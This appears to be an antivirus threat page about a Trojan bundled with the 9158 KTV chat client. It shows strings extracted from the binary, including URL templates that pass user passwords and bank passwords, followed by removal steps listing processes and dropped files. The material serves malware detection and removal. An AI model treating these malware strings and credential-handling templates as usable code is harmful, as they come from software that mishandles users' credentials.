\SkinRes\IMToolBar.bmp
Head\era.bmp
Head\crown.bmp
Head\topestpurple2.bmp
Head\topestpurple.bmp
Head\DiamondPurple2.bmp
Head\DiamondPurple.bmp
Head\queenPurple2.bmp
Head\queenPurple.bmp
Head\Purple2.bmp
Head\Purple.bmp
Head\purplevip2.bmp
Head\purplevip.bmp
Head\level15.bmp
Head\redvip.bmp
Head\0_bluevip.bmp
Head\paliesman.bmp
onclick="window.external.OnclickHead('1')">
<img width="49" height="50" src="%s" style=cursor:hand>
hXXp://
Head\user_photo.bmp
Head\H5_2.bmp
Head\H5_1.bmp
Head\H4_2.bmp
Head\H4_1.bmp
Head\H3_2.bmp
Head\H3_1.bmp
Head\H2_2.bmp
Head\H2_1.bmp
Head\H1_2.bmp
Head\H1_1.bmp
Head\H0_2.bmp
Head\H0_1.bmp
-L"prdname=9158 idx=%s id=%s nick=%s pwd=%s rinfo=0"
%Y%m%d
%s\%d\%s
SkinRes\BtnMinInfor.bmp
SkinRes\BtnCloseInfor.bmp
%s&uidx=%s
SkinRes\brInfor.bmp
SkinRes\blInfor.bmp
SkinRes\trInfor.bmp
SkinRes\tlInfor.bmp
%s %s
%d||%d||%d||%s
.img50 { width:50px; height:50px; text-align:center; }
div.img50 img { max-width:50px; max-height:50px;
yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 50 ? "50px" : "auto"):(this.style.height = this.offsetHeight >= 50 ? "50px" : "auto"));
<body scroll="no" bgcolor=#FEFECC><div class="img50"><img src='%s' /></div></body></html>
%s x%d
skinres\message.bmp
updateitem.dll
hXXp://roommanage.9158.com/room_regin/reg.aspx?introducer=%s&ntype=1&station=%s
%s;%s
LoginDlg
SkinRes\admess.bmp
\SkinRes\admess.bmp" width="
<body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 oncontextmenu="window.event.returnValue=false;" style="overflow-x:hidden;overflow-y:hidden;width:100%;border-width=0;border-style:none">
' target='_blank' onFocus='this.blur()'>
\guestlogin.ini
SkinRes\TG\QRCode.bmp
SkinRes\TG\mins1.bmp
SkinRes\TG\closes1.bmp
Login_Guest
Hall_LoginCancel
Hall_LoginOK
HallLoginReg
Login_Weibo
Login_Alipay
Login_QQ
Login_idx
Login_User
GuestLogin_Tui
GetLoginNodeData.aspx
dl.week8.net
platname=%s&userid=%s&loginip=%s&loginport=%d
/Error.txt
CLoginDlg m_nLoginType!=nType
hXXp://roommanage.9158.com/active/roomsearch/iproom_in.aspx
SysMsgCloseBtn
skinres\login.gif
hXXp://VVV.9158.com/?code=
SkinRes/IeClose.png
%H : %M      %Y/%m/%d
nIDKey
MsgCloseBtn
celeburl
taurl
relogin
gourl
SockClient.dll
Multi*.dll
.PAVCObject@@
.PAVCException@@
.PAVCFileException@@
%sBugReport.exe ,%s
Flags:X
DS:X ES:X FS:X GS:X
SS:ESP:X:X EBP:X
CS:EIP:X:X
EAX:X
EBX:X
ECX:X
EDX:X
ESI:X
EDI:X
Fault address1: X X:X %s
Exception code1: X %s
//build4.5%d-%d-%d %d:%d:%d***************************************************
NTDLL.DLL
FLT_INVALID_OPERATION
FLT_DENORMAL_OPERAND
X X X:X %s
SkinRes\buttonmin.bmp
SkinRes\buttonclose.bmp
SkinRes\rightBackground.bmp
SkinRes\leftBackground.bmp
SkinRes\BackgroundRB.bmp
SkinRes\BackgroundLB.bmp
SkinRes\BackgroundRT.bmp
SkinRes\BackgroundLT.bmp
in_coffer_new.aspx
useridx=%s&userpass=%s&type=4&oldbankpass=%s&newbankpass=%s
%s?user=%s&psw=%s&useridx=%s
%s&r=%d
{6C9A41B3-ABB2-45f7-B591-93456A6FCD20}
{0CFC0B7A-7907-49FD-B181-1B8B3955DB74}
CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\
CLSID\%s\InprocServer32
SkinRes\phone.bmp
SkinRes\lock.bmp
SkinRes\key2.bmp
SkinRes\key1.bmp
SkinRes\shield.bmp
\sndvol.exe
\sndvol32.exe
hXXp://room.9158.com/in_user_roomin.aspx?roomid=100000
VolumeDB:%d, Pole:%d
in_userchange.aspx
useridx=%s&type=1
in_userchange_new.aspx
type=2&useridx=%s&name=%s&sex=%s&birthday=%s&province=%s&city=%s
type=2&useridx=%s&oldpass=%s&newpass=%s
PersonalSetting_MSG
%sMultiChatGuest.dll
Host not found: %s
%s - WSAError: %ld
ip=%s&nType=%s&insert=%s&idx=%s&ID=%s&promoid=%s&sType=%s&Version=2
EnterTURL
skinres\WaitRoom.gif
\SkinRes\ServerInfo.bmp
useridx=%s&userpass=%s&type=3&bankcash=%d&sepwd=%s
worldbrocast.xml
RankMsgOkBtn
active/affiche/affiche_ktv.aspx
roomgame/get_gameinfo.aspx
hXXp://pay.9158.com/v/ips/NetPay_vip.aspx
useridx=%s&userpass=%s&type=2&bankcash=%d
SkinRes\Hall\search_text_bg.bmp
SkinRes\Hall\return.bmp
active/roomsearch/im_search_k.aspx
searchstr=%s&useridx=%s
%s%s%s
!%d/%d
SkinRes/GiftBox.bmp
SkinRes\getmoney.bmp
Button%d
%s List of controls follows:
%s Number of controls: %lu
%s Number of channels: %lu
%s Number of source lines associated with destination line: %lu
%s Manufacturer and product IDs: %u -- %u (see mmreg.h or help subject: "Manufacturer and Product Identifiers")
%s Target name: %s
%s Target type: %lu --
%s Audio line is active. signal is probably passing through the line.
%s Audio line is disconnected.
%s Audio line is an audio source line associated with a single audio destination line.
%s Short Name: %s
%s Name: %s
%s Audio line is a source originating from the waveform-audio output digital-to-analog converter (DAC).
%s MIXERLINE_COMPONENTTYPE_SRC_WAVEOUT
%s Audio line is a source originating from an incoming telephone line.
%s MIXERLINE_COMPONENTTYPE_SRC_TELEPHONE
%s Audio line is a source originating from the output of an internal synthesizer.
%s MIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER
%s Audio line is a source originating from personal computer speaker.
%s MIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER
%s Audio line is a microphone recording source.
%s MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE
%s Audio line is a line-level source (for example, line-level input from an external stereo).
%s MIXERLINE_COMPONENTTYPE_SRC_LINE
%s Audio line is a digital source (for example, digital output from a DAT or audio CD).
%s MIXERLINE_COMPONENTTYPE_SRC_DIGITAL
%s Audio line is a source originating from the output of an internal audio CD.
%s MIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC
%s Audio line is a source originating from the auxiliary audio line.
%s MIXERLINE_COMPONENTTYPE_SRC_AUXILIARY
%s Audio line is an analog source (for example, analog output from a video-cassette tape).
%s MIXERLINE_COMPONENTTYPE_SRC_ANALOG
%s Audio line is a source that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_SRC_UNDEFINED
%s Audio line is a destination that will be the final recording source for voice input.
%s MIXERLINE_COMPONENTTYPE_DST_VOICEIN
%s Audio line is a destination that will be the final recording source for the waveform-audio input (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_WAVEIN
%s Audio line is a destination that will be routed to a telephone line.
%s MIXERLINE_COMPONENTTYPE_DST_TELEPHONE
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive headphones.
%s MIXERLINE_COMPONENTTYPE_DST_HEADPHONES
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive speakers.
%s MIXERLINE_COMPONENTTYPE_DST_SPEAKERS
%s Audio line is a destination used for a monitor.
%s MIXERLINE_COMPONENTTYPE_DST_MONITOR
%s Audio line is a line level destination that will be the final recording source for the analog-to-digital converter (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_LINE
%s Audio line is a destination that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_DST_UNDEFINED
%s Audio line is a digital destination (for example, digital input to a DAT or CD audio device).
%s MIXERLINE_COMPONENTTYPE_DST_DIGITAL
%s Line type :
%s -----------------------------------------------------------------------
%s Name: %d
%s -------------- Item %d -------------
%s Number of items per channel: %d
%s - Multiple control. The control has two or more possible settings.
%s - Control is disabled
%s - Uniform control
%s Status and support flags:
%s - Steps: %lu
%s - Max: %lu
%s - Min: %lu
%s - Max: %ld
%s - Min: %ld
%s Custom control
%s Name: %s
%s Short Name: %s
%s -----------------------------------------------------------------
%s Control type:
%s ---------------------------- Control ----------------------------
== Source line. Index = %d ===========================================================
** Destination line. Index = %d *******************************************************************
You will pass these to the Init() functions of the various CMixerBase-derived classes
Number of destination lines: %d
Name of device: %s
..............nVolume:%d
dBFS..............%d,%d
%Y/%m/%d/%H:%M:%S
------UrlAnalyzeEdit---Error---
<a target='_blank' href='%s'>%s</a>
/active/userinfor/get_userview.aspx?useridx=%s&r=%d
\9158.exe
%d/%d(
SkinRes\X.bmp
useridx=%s&userpass=%s&type=5&sepwd=%s
<script>window.onerror=function(){return true;};function isSecurity(v){var sinfo;if (v.length < 3) { return 0;} var lv = -1; if (v.match(/[a-z]/ig)){lv  ;} if (v.match(/[0-9]/ig)){lv  ;} if (v.match(/(.[^a-z0-9])/ig)){lv  ;} if (v.length < 6 && lv > 0){lv--;}switch (lv) {case 0:sinfo='<font color=red>
</font>';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');</script><style>body{margin:0px; padding:0px;overflow-x:hidden;overflow-y:hidden;word-break:break-all;background:#d5eaff;}td{padding-right:5px;height:15px;font-size:12px;color:#666666}a{color: #0b66c2; text-decoration:none;};a:hover{color: #0b66c2; text-decoration:underline;};</style><body>
SkinRes\X2.bmp
hXXp://roommanage.9158.com/active/usersearch_k/get_bindinfo.aspx?idx=
<table onMouseOver='window.external.OnKillTimer(0)' onMouseOut='window.external.OnSetTimer(0)' width='100%%' height='100%%' border='0' cellpadding='0' cellspacing='0' align=center><tr><td bgcolor=#c8e3ff width=84 align=right>
:</td><td width=15> </td><td width=90>%s</td><td></td></tr><tr><td bgcolor=#c8e3ff align=right>
:</td><td></td><td colspan=2>%s</td></tr><tr><td bgcolor=#c8e3ff align=right>
:</td><td></td><td id=passqd name=passqd style='color:red'></td><td><a href='%s' align=left target=_blank>
:</td><td></td><td>%s</td><td><a href='%s' align=left target=_blank>
:</td><td></td><td style='color:gray'>%s</td><td><a href='%s' align=left target=_blank>
</font>';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');</script><style>body{margin:5px; padding:0px;overflow-x:hidden;overflow-y:hidden;word-break:break-all;background:white;}td{height:19px;font-size:12px;color:#666666}a{color: blue; text-decoration:underline;};</style><body>
SkinRes/userlogininfo.png
<body style="overflow:scroll;overflow-x:hidden;overflow-y:hidden;margin:0;background:url('
SkinRes\ie_bg.png
SkinRes\Notifybutton.bmp'
%s&userid=%s&type=%s
skinres\WarehouseBG.bmp
CWebBrowser2
:%d%d%d%d%d%d
%s&surl=%s
-%d-1
skinres\weibo\SendWeiBoTop.bmp
SkinRes\weibo\CloseWeibo.bmp
/**%nick/**
hXXp://room.tiao58.com/dance_room_new/logpay/silver_help.aspx
SkinRes/BackgroundRB.bmp
SkinRes/BackgroundLB.bmp
SkinRes/BackgroundRT.bmp
SkinRes/BackgroundLT.bmp
KX......GetInputDeviceName...return false
KX......GetInputDeviceName...%s
KX......GetInputDeviceName...2
KX......GetInputDeviceName...1
sound\Blip.wav
KX......GetOutputDeviceName...return false
KX......GetOutputDeviceName...%s
KX......InitSubDlg...m_dlgYsq
KX......InitSubDlg...m_dlgMkf
00000000000000000001
d:\Program Files\9158KTV\9158.RPT
#':<@%' 
!%(.FHL
___???***666
(Y%C|B^
*X.Gv<S
*`.Gz
.X7Kw.Dx*<n$4e%8k7Kv4K{@V
(W.CuC^
*&)@??%$*
'L":a.Ds 8f.?l0:^
D%3[.Dp
1&-T.Bg
,Y.Cr,@n*?h6N{[o
version="1.0.0.0"
name="test.exe.manifest"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
!"#$%&'()* ,
{8856F961-340A-11D0-A96B-00C04FD705A2}
6, 7, 0, 3
Windows

9158IE.exe_2252:




.text
`.rdata
@.data
.rsrc
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
ole32.dll
OLEAUT32.dll
MSVCP60.dll
9158IE.exe
Content-Type: application/x-www-form-urlencoded
CWebBrowser2
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
9158IE.EXE


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    yx_dts.exe:1476
    %original file name%.exe:1452
    notify.exe:2104
    9158chat2_ktv083_98.exe:516
    assistupdate.exe:2080
    dts.exe:1728
    dts.exe:1772
    OfficeAssist.0419.80.1123.exe:744
    OfficeAssist.0419.80.1123.exe:1752
    regsvr32.exe:2136
    regsvr32.exe:2716
    regsvr32.exe:1280
    regsvr32.exe:2280
    regsvr32.exe:1124
    regsvr32.exe:2940
    9158.exe:2088

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Desktop\´óÌìʹ֮½£.lnk (944 bytes)
    %Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe (29256 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\´óÌìʹ֮½£.lnk (922 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw43.tmp (44165 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (3 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\´óÌìʹ֮½£\жÔØ´óÌìʹ֮½£.lnk (975 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\´óÌìʹ֮½£\´óÌìʹ֮½£.lnk (956 bytes)
    %Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (430 bytes)
    %Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe (11048 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CABBAJEH.htm (765 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\icons[1].gif (7 bytes)
    C:\temp.icon (1444 bytes)
    %Program Files%\9158ktv\DownLoad\9158chat2_ktv083_98.exe.tmp (149051 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xui[1].js (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe (49889 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    C:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027 (108 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_png24.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\util\json3.js (8 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\down\flowcontrol.zip.dt! (148 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\topad.png (4 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\down\utils.zip.dt! (20716 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\log\notify_2014_12_20.log (6560 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\flowcontrol\flowcontrol.htm (12 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\skin_top.png (6 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\jQuery.js (2392 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_con.png (7 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\down\meihua_mini.zip.dt! (92840 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading24.gif (1 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\bg.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\main.css (784 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\warning.png (1 bytes)
    %WinDir%\Tasks\PPTAssistantNotifyTask_adm.job (392 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Utils.js (6 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading48.gif (1 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading16.gif (455 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\adbgimg.png (2392 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\hostapi.js (14 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\load.js (8184 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\index.html (7 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading.gif (5 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Urchin.js (784 bytes)
    %Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\moment.js (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc48.tmp (1080968 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\жÔØ 9158¶àÈËÊÓƵ.lnk (505 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\9158¶àÈËÊÓƵ.lnk (681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (4992 bytes)
    %Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓƵ.lnk (575 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (11 bytes)
    %WinDir%\Tasks\PPTAssistantUpdateTask_adm.job (404 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\reg2[1].jpg (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[2].js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (2672 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getcard[1].jpg (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[2].js (967 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\04190114Mvpaw[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].css (961 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[1].css (4432 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\log[1].jpg (6220 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\19204027FVrEy[1].jpg (5194 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[2].js (3759 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\rem_on[1].jpg (807 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wl[1].htm (153 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[2].js (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\101215116dbQk[1].jpg (2287 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\1610242766g2O[1].jpg (2625 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (680 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[2].css (961 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[2].jpg (1883 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wl[1].htm (153 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\client[1].htm (2395 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].jpg (11642 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].js (4865 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dot[1].jpg (463 bytes)
    %Documents and Settings%\%current user%\Application Data\dts\Upgrade\app.ini (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\18162330BzQOu[1].jpg (2097 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\istat.controller[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.clientclass[1].js (1529 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe (59304 bytes)
    %Program Files%\MM-liao8398.exe (59304 bytes)
    %Program Files%\2.ico (47632 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfficeAssist.0419.80.1123[1].exe (225788 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe (58296 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Base64.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\nsProcess.dll (4 bytes)
    %Program Files%\onlines_30863.exe (195990 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Program Files%\1.rar (26 bytes)
    %Program Files%\yx_dts.exe (58296 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\onlines_30863[1].exe (195990 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\NSISdl.dll (14 bytes)
    %Program Files%\OfficeAssist.0419.80.1123.exe (225788 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].ico (47632 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\feature.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (8215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe (4185 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihuappt.pps (7385 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (1209 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (334 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\103.png (346 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (933 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\30.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\20.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (300 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (4220 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistdownloader.exe (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\101.png (951 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (198 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\setup.cfg (643 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\notify.exe (2321 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\卸载.lnk (994 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\PPT美化大师.lnk (910 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist64.dll (5873 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\10.png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (1885 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2007.ppsx (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (8201 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (643 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistupdate.exe (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\104.png (275 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2010.ppsx (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\desktoptip.exe (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (5466 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (198 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (182 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\1.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\3.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\setup.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (1810 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll (6841 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (5442 bytes)
